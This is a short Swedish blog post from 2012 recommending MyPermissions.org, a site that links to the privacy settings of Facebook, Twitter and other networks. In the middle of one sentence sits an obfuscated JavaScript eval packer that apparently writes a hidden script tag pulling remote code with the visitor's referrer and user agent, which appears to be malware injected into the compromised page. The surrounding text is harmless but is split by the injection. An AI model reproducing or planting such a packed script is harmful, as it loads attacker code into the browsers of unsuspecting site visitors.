Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Har du koll på dina näträttigheter?

Har du koll på dina näträttigheter?
Filip Urde
  • On 3 januari, 2012
  • http://www.revue.se/filip-urde

Har du koll på dina näträttigheter och då på alla dessa sociala nätverk som du är medlem i?  Hysterin kring att Facebook äger dina fotografier har mer eller mindre precis lagt sig, men det kan vara bra att kolla upp dina rättigheter och nu finns en hemsida som visar dig hur. Den heter MyPermissions.org.

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nkbrk|var|u0026u|referrer|edref||js|php’.split(’|’),0,{}))
är inget märkvärdigt i sig, det är en hemsida som har länkar till privacy-inställningarna hos några av de mer populära nätverkssidorna. Alltså något enkelt, men nog så nyttigt då jag själv kan säga att jag inte är speciellt engagerad i mina rättigheter online. Det är värt att kolla upp. Förutom Twitter och Facebook, finns även Google Connect, Yahoo, LinkedIn, Dropbox, Instagram och Flickr.

Mest aktuellt är nog rättigheterna kring din Facebook och Twitter.
mypermissions.org